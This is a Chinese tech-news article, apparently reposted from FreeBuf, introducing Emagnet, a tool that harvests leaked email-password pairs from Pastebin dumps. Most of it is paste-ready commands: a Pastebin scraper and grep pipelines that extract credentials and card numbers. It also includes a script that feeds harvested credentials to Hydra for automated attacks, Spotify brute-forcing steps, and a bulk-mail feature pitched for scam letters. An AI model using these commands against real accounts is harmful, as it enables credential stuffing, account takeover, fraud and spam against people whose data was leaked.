EMAGNET:从Pastebin上传的泄漏数据库中捕获电子邮件地址和密码
2019-09-17 16:00:03 Author: www.freebuf.com(查看原文) 阅读量:142 收藏

Emagnet是一款非常强大的工具,其主要目的是从pastebin上传的泄漏数据库中捕获电子邮件地址和密码。当密码在pastebin.com上不在列表中时,几乎不可能找到泄露的密码。他们已被pastebin的技术人员删除,或仅仅只有个别人上传。说实话,这比在大海中捞针要容易,然后使用我们想要收集的数据在pastebin上查找过时的上传内容。

将在下次推送中修复的已知问题!

SSH Bruterforcer无法完全正常工作

使用termux app时Android设备的依赖包不能与brute force tools + screen一起使用

将错误数据发送到emagnet.log中,以获取包含正确数据的文件

Demo – 它是如何工作的

下图左侧为你运行时所看到的界面,右侧为后台实际运行的内容。

当然一切都会被存储到日志目录(过滤的电子邮件地址)

现实中的运行示例

在 Linux/MacOSX 上

git clone https://github.com/wuseman/emagnet
cd emagnet
chmod +x emagnet*
.
./emagnet --emagnet

在 Android 上运行通过 Termux

没有termux也能正常工作,但你必须安装wget+curl

从play store下载termux 

安装完成后,复制并粘贴以下命令:

echo -e '
pkg update
pkg upgrade -y
pkg install wget curl git -y
git clone https://github.com/wuseman/emagnet
cd emagnet
bash emagnet --emagnet' > emagnet-termux.sh
bash emagnet-termux.sh

在 Windows 10 上

请访问我的installation wiki以获取更多信息(包括视频)

现在耐心将会是你成功的关键!:-)

Wiki 部分

关于Emagnet的前世今生

所有功能的动图预览

以下是几个经常被问及的问题

问:为什么不直接使用curl来获取URL,并在我们被临时禁止时使用tor来更改IP?

答:因为我们必须完成验证,然后才能获取href=”https://www.cloudflare.com/5xx-error-landing?utm_source=iuam作为响应。如果你只是想偶尔从pastebin中抓取一些上传,你可以在shell中复制并粘贴以下代码。

cat << EOF > emagnet-curl.sh
#!/bin/bash
curl -Ls https://pastebin.com|grep -o -E 'href="([^"#]+)"' | cut -d'"' -f2|grep archive -A10 | sed -n 2,9p|sed 's/^/http:\/\/pastebin.com\/raw/g' > /tmp/.emagnet
while read line; do wget -q \$line; done < /tmp/.emagnet
clear
printf "Successfully downloaded $(cat /tmp/.emagnet|wc -l) files from pastebin:\n$(cat /tmp/.emagnet|cut -d/ -f5|xargs)"
EOF
chmod +x emagnet-curl.sh
bash emagnet-curl.sh

问:为什么要删除auto bruteforce泄露邮件地址的功能?

答:它已被重新添加到Emagnet,接下来会添加支持更多协议的bruter。敬请期待!

问:如何搜索visa或万事达卡,我想知道我的卡是否已泄露?

答:获取一些上传后,在你的shell中复制并粘贴以下内容:

source /etc/emagnet.conf;grep -rieo '\(^\|[^0-9]\)\{1\}\([345]\{1\}[0-9]\{3\}\|6011\)\{1\}[-]\?[0-9]\{4\}[-]\? [0-9]\{2\}[-]\?[0-9]\{2\}-\?[0-9]\{1,4\}\($\|[^0-9]\)\{1\}' $EMAGNET

问:Emagnet给我返回的结果为null,只是一遍又一遍地再次尝试,然后pastebin要求重新验证。我该怎么办?

答:打开浏览器,跳转到https://pastebin.com并输入re-captch即可,如果这还不行 – 那就先等待一段时间或使用VPN获取新的IP。除非你知道如何绕过验证码,否则在这种情况下,任何工具都无法正常工作。

配置 & 安装

在Windows 10上安装Emagnet

1) Install Ubuntu or any other distro from Microsoft Store
 2) When installation has been done, hit 'start'
 3) Now type 'sudo -s' and enter your password
 4) Now update repo and install git, just copy and paste the below lines
 apt update; apt install git -y; git clone https://github.com/wuseman/emagnet
 cd emagnet;chmod +x ./emagnet; ./emagnet --emagnet

注意关于视频:—> 你不再需要运行emagnet-setup,只需运行emagnet即可。

在 Linux 上

你可以在shell中复制并粘贴以下代码

git clone https://github.com/wuseman/EMAGNET
cd EMAGNET;bash emagnet --emagnet

在 MACOSX 上

你可以在shell中复制并粘贴以下代码

git clone https://github.com/wuseman/EMAGNET
cd EMAGNET;bash emagnet --emagnet

在 ANDROID 上

视频

echo -e '
pkg update
pkg upgrade -y
pkg install wget curl git -y
git clone https://github.com/wuseman/emagnet
 cd emagnet
 bash emagnet --emagnet' > emagnet-termux.sh
 bash emagnet-termux.sh

使用emagnet ‘spam’ -(这不是垃圾邮件功能)

那么为什么这会被添加到brute tool中呢?

如果你经营一家企业,想要快速轻松地把你的垃圾邮件发送给其他人。

如果你是想传播尼日利亚信件,你可以用这个功能。

如果你想把你的广告转发给新朋友。

如何运行

你必须先安装ssmtp才能使用它。

Gentoo

emerge --ask ssmtp

Debian/Ubuntu/Kali/Mint and other apt distros:

apt install ssmtp

安装完成后,编辑设置值并复制并粘贴到终端中就可以了!

以下是一个gmail的例子:

cat < "EOF" > /etc/ssmtp/ssmtp.conf
  user="Wuzeman Emagnetzon"
  mailhub=smtp.gmail.com:587
  rewriteDomain=gmail.com
  # hostname=yourlocalhost.yourlocaldomain.tld
  TLS_CA_FILE=/etc/pki/tls/certs/ca-bundle.crt
  UseTLS=Yes
  UseSTARTTLS=Yes
  [email protected]
  AuthPass=<password>
  AuthMethod=LOGIN
  FromLineOverride=yes
EOF

现在运行emagnet,直到你有一些邮件地址:

./emagnet -e

然后,运行:

./emagnet -s

现在,你将看到要向多少个电子邮件地址发送邮件,如果你选择“yes”,那么你将发送邮件。就这么简单!

   _                      _______                      _
  _dMMMb._              .adOOOOOOOOOba.              _,dMMMb_
 dP'  ~YMMb            dOOOOOOOOOOOOOOOb            aMMP~  `Yb
 V      ~"Mb          dOOOOOOOOOOOOOOOOOb          dM"~      V
          `Mb.       dOOOOOOOOOOOOOOOOOOOb       ,dM'
           `YMb._   |OOOOOOOOOOOOOOOOOOOOO|   _,dMP'
      __     `YMMM| OP'~"YOOOOOOOOOOOP"~`YO |MMMP'     __
    ,dMMMb.     ~~' OO     `YOOOOOP'     OO `~~     ,dMMMb.
 _,dP~  `YMba_      OOb      `OOO'      dOO      _aMMP'  ~Yb._
             `YMMMM\`OOOo     OOO     oOOO'/MMMMP'
     ,aa.     `~YMMb `OOOb._,dOOOb._,dOOO'dMMP~'       ,aa.
   ,dMYYMba._         `OOOOOOOOOOOOOOOOO'          _,adMYYMb.
  ,MP'   `YMMba._      OOOOOOOOOOOOOOOOO       _,adMMP'   `YM.
  MP'        ~YMMMba._ YOOOOPVVVVVYOOOOP  _,adMMMMP~       `YM
  YMb           ~YMMMM\`OOOOI`````IOOOOO'/MMMMP~           dMP
   `Mb.           `YMMMb`OOOI,,,,,IOOOO'dMMMP'           ,dM'
     `'                  `OObNNNNNdOO'                   `'
                           `~OOOOO~'
=================================================================
                         Targets: 8
- Do you want to send an email to all targets (yes/NO): yes
===============================================================
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
[+] Sending email to [email protected]....................[.ok.]
........... and so on

如何使用 brute forcer 用于 spotify

在GNU/Linux Gentoo上支持emagnet的发行版,只需执行以下操作:

emerge --ask eselect-repository
 eselect repository enable palmer
 eix-sync;eix-update
 emerge --ask =dev-libs/libspotify-12.1.51
 emerge --ask media-libs/portaudio

现在你已准备好暴破spotify账户:

bash emagnet --bruteforce spotify

在Ubuntu/Kali/Debian上:

wget -q -O - https://apt.mopidy.com/mopidy.gpg | sudo apt-key add -
wget -q -O /etc/apt/sources.list.d/mopidy.list https://apt.mopidy.com/stretch.list
sudo apt-get update
sudo apt-get install libspotify12 libspotify-dev libportaudio

现在你已准备好暴破spotify账户:

bash emagnet --bruteforce spotify

如何使用 emagnet 运行 VPN

使用你的providers名称在/etc/openvpn中创建一个文件夹,例如hidemyass:

mkdir -p /etc/openvpn/hidemyass

从提供商主页下载配置文件,并将其解压缩到以上创建的文件夹中。

这里概述了如何使vpn工作(不要忘记将provider和vpn设置为true)

CountryCode               Name Your Files As Below For Get VPN Running:
........................................................................
be = belgium              /etc/openvpn/vpnprovider/vpnprovider.be.ovpn
bg = bulgaria             /etc/openvpn/vpnprovider/vpnprovider.bg.ovpn
cz = czech republic       /etc/openvpn/vpnprovider/vpnprovider.cz.ovpn
dk = denmark              /etc/openvpn/vpnprovider/vpnprovider.dk.ovpn
es = spain                /etc/openvpn/vpnprovider/vpnprovider.es.ovpn
fi = finland              /etc/openvpn/vpnprovider/vpnprovider.fi.ovpn
gb = great britain        /etc/openvpn/vpnprovider/vpnprovider.gb.ovpn
gr = greece               /etc/openvpn/vpnprovider/vpnprovider.gr.ovpn
hk = hong-kong (.ch)      /etc/openvpn/vpnprovider/vpnprovider.hk.ovpn
hu = hungary              /etc/openvpn/vpnprovider/vpnprovider.hu.ovpn
it = italy                /etc/openvpn/vpnprovider/vpnprovider.it.ovpn
md = moldavia             /etc/openvpn/vpnprovider/vpnprovider.md.ovpn
nl = netherlands          /etc/openvpn/vpnprovider/vpnprovider.nl.ovpn
no = norway               /etc/openvpn/vpnprovider/vpnprovider.no.ovpn
pl = poland               /etc/openvpn/vpnprovider/vpnprovider.pl.ovpn 
pt = portugal             /etc/openvpn/vpnprovider/vpnprovider.pt.ovpn
ro = romania              /etc/openvpn/vpnprovider/vpnprovider.ro.ovpn
se = sweden config nr 1   /etc/openvpn/vpnprovider/vpnprovider.se.ovpn
se2 = sweden config nr 2  /etc/openvpn/vpnprovider/vpnprovider.se2.ovpn
se3 = sweden config nr 3  /etc/openvpn/vpnprovider/vpnprovider.se3.ovpn
se4 = sweden config nr 4  /etc/openvpn/vpnprovider/vpnprovider.se4.ovpn
us = united states        /etc/openvpn/vpnprovider/vpnprovider.us.ovpn

当然,如果这是一个新的设置,那么不要忘记在必要时添加你的login登录文件:

for files in ./etc/openvpn/proivder/*; do sed -i 's/auth-user-pass/auth-user-pass login.txt/g' "${files}"; done

请参阅emagnet.conf中的VPNCOUNTRYS,了解默认情况下可用的国家/地区以及emagnet如何读取文件。当然,你也可以将国家编辑为任何其他地方。

如果你有两个providers,甚至是三个,请按上述步骤操作,但请为你的其他providers编辑VPNPROVIDER2和3,并在VPNCOUNTRYS2和3之后用国家名称命名。

示例脚本,用于快速启动暴破:

根据需要修改:

cat > my-bruteforce-tool.sh <<EOF
#!/bin/bash                               
# inotify-tools is required for this sample
# Where emagnet.conf is stored so you can read folders
. /path/to/emagnet.conf                          
# Where to place email + passwords we have found wich will be our target
HYDRA_TARGETS="/tmp/.emagnet-hydra-targets.txt"          
# When something happens in emagnet's temp folder  
# then search for email+password combos and if something is found
# then your command will be triggered and attack the targets.
while inotifywait -e modify "${EMAGNETTEMP}"; do
PASTEBIN_TARGETS=$(grep -rEiEio "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b:...*" "${EMAGNETTEMP}"|awk '{print $1}'| \
     cut -d: -f2,3|uniq|grep -v ''\|'/'\|'"'\|','\|'<'\|'>'\|'\/'\|'\\'|grep -v '/' > "${HYDRA_TARGETS}")
    # If the target file is empty, then we monitor the dir again
    # until emagnet download new files otherwise use the prefered tool and attack your targets 
      if [[ -s "${HYDRA_TARGETS}" ]]; then
         <add your hydra or prefered tool here>
      fi
 done
EOF

更改权限,以执行脚本:

chmod +x my-bruteforce-tool.sh

运行脚本:

./my-bruteforce-tool.sh

并在另一个窗口同时启动emagnet。

./emagnet --emagnet

如何查找你的 facebook 凭证,如果它已被泄露。

搜索和正则表达式

在文件夹中,你将存储来自pastebin上传的所有下载,你可以搜索几乎任何内容,以下是我为大家提供的一些示例。

Facebook 泄露

Facebook Passwords很多次上传是使用电话号码而不是邮件地址,并且东部有很多泄露,为了快速找到这些密码,你可以尝试运行以下命令获取结果:

grep -r -e 'Facebook = [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]' -A2

以上命令的输出:

/emagnet/pastebin/ajfafilename:Email Facebook = 0895xxxxxxxx
/emagnet/pastebin/ajfafilename-Pass = konxxxxxxxx
/emagnet/pastebin/ajfafilename:Email Facebook = 0858xxxxxxxx
/emagnet/pastebin/ajfafilename-Pass = mxxxxxxxx
/emagnet/pastebin/ajfafilename:Email Facebook = 0895xxxxxxxx
/emagnet/pastebin/ajfafilename-Pass = taxxxxxxxx
/emagnet/pastebin/ajfafilename:Email Facebook = 0823xxxxxxxx
/emagnet/pastebin/ajfafilename-Pass = oxxxxxxxx
/emagnet/pastebin/ajfafilename:Email Facebook = 0818xxxxxxxx
/emagnet/pastebin/ajfafilename-Pass = d1xxxxxxxx

IPV4 地址

grep -roE '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' .

HTTP/HTTPS URLS

Example 1:

grep -rEo '(ftp|ftps|http|https)://[^/"]+'

Example 2:

grep -Eo "(ftp|ftps|http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq

Example 3:

cat * | tr \" \\n | grep https\*://

Example 4 – > 在暗网上查找URL,请使用以下命令:

grep -rEo '.*[.]onion$

示例1的输出:

filename:https://www.beachcolony.com
filename:http://java.sun.com
filename:http://www.w3.org
filename:https://br1.api.riotgames.com
filename:https://github.com
filename:http://openocd.org
Ddfadfae:https://www.googletagservices.com
filenamw:https://www.googletagservices.com
filename:ftp://111.111.111:3200
filename:http://www.pornbb.org
filename:http://www.pornbb.org
filename:http://www.pornbb.org
.............

查找图片:

filename:http://imag-some-site-ekle.com/1/0/v6/hiddenimagevywusewman.jpg
filename:http://images-some-site.com/1/w/4m/hiddenimagevywusewman.jpg
filename:http://imagessome-sitele.com/1/5/8l/yhiddenimagevywusewman.png
filename:http://imsome-sitees-brsome-siteacklesome-sitem/1/0/16/hiddenimagevywusewman.jpg
grep -rioE '(http|https)://(.*).png' # PNG FILES
grep -rioE '(http|https)://(.*).jpg' # JPG FILES
egrep -rio 'http.*[.]jpe?g'

查找泄露密码:

大部分泄露的密码格式为’[email protected]:passwd’,你可以使用以下命令抓取它们:

grep -HiEhr -o -e "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b:...*" | grep '\S'
[email protected]:hiddenPASS985
[email protected]:hiddenPASSina
[email protected]:hiddenPASSro60 
[email protected]:hiddenPASSRZ47
[email protected]:hiddenPASScde
[email protected]:hiddenPASSrmia
[email protected]:hiddenPASSudal
[email protected]:hiddenPASSino
[email protected]:hiddenPASSton
[email protected]:hiddenPASSiglio
[email protected]:hiddenPASS0780
[email protected]:vhiddenPASSina

搜索帐户时获得更友好的用户输出:

1)首先,搜索包含你要查找单词的所有文件,在此示例中,我将搜索所有SPOTIFY帐户:

find /opt/emagnet/archive/ -type f | parallel -k -j150% -n 1000 -m grep -H -in 'spotify' {}

2)你可能已经发现当我只搜索’spotify’时会发生很大的混乱……那么,我会把所有’MAIL ADDRESSES’+'SPOTIFY’改为:

grep -rEiEio "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b:...*"

3)我想要逐行排序所有内容,而不是这里或那里有许多空格我们可以使用\S:

grep '\S'

4)我不关心文件名,因为我们现在想要收集的是’MAIL ADDRESSES’ + ‘PASSWORDS’:

cut -d: -f2,3

5)泄漏所有关于pastebin的数据的人有不同的形式来分隔内容,所以让我们跳过所有包含’mail|;/password’/的形式,而将目标锁定在mail:passwords上,因为这是最常用的形式,如果我们想的话,稍后可以很容易地过滤掉它,但要尽可能简单地保存它。

awk -F'|' '{print$1}'|cut -d/ -f1

6)现在我还想保持列表的排序:

sort -r

7)当然我也不需要重复的内容:

awk -F, '!seen[$1]++'

8)如果你希望所有帐户和密码都在一个单独的文件中,可以使用bash中的>>将数据写入文件。如果你想要将详细信息分开,你可以使用 : 或任何你想要使用的字符,如果你想将列表导入你自己的sql/mysql数据库,你可以使用sed来达到这个目的:

commands here from above | _sed 's/:/,/g'_ > leaked-spotify-accounts-20190401_to_20190405.txt

将以上命令整合为一条单行命令:

find /opt/emagnet/archive/ -type f | parallel -k -j150% -n 1000 -m grep -H -in 'spotify' {} | grep -rEiEio "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b:...*"|grep '\S' | cut -d: -f2,3|awk -F'|' '{print$1}'|cut -d/ -f1|sort -r|less|awk -F, '!seen[$1]++' > leaked-spotify-accounts-20190401_to_20190405.txt

你只需将’spotify’更改为其他目标如gmail,paypal,facebook,twitter等等即可。

系统要求

Bash – 在此处查找有关bash的更多信息

Wget – 在此处查找有关wget的更多信息

Curl – 在此处查找有关curl的更多信息

BBC NEWS: “Pastebin: Running the site where hackers publicise their attacks”

Changelog

版本 changelog。

注意

严格禁止通过emagnet攻击不同类型的帐户,这些帐户是你未被授予或允许攻击的,因此这将违反法律。在一些国家你可能因此入狱。当你克隆或下载它时,即表明你需要对自己的行为完全负责。wuseman不会对任何用户的行为负责,所有责任都将由使用者自行承担。

另外,如果你认为该项目的开发是出于违法目的,那么我对你的意见不感兴趣,请自行保留!Emagnet不会向任何开发人员或其他个人或组织泄露任何用户数据。没有任何统计数据可以跟踪任何用户,所以如果你询问我有关这方面的问题,我只能回答不知道,说实话我也不在乎。

感谢

最后,我要在此感谢m1st每天为我们提供的合法泄露。

*参考来源:GitHub,FB小编secist编译,转载请注明来自FreeBuf.COM


文章来源: https://www.freebuf.com/sectool/213048.html
如有侵权请联系:admin#unsafe.sh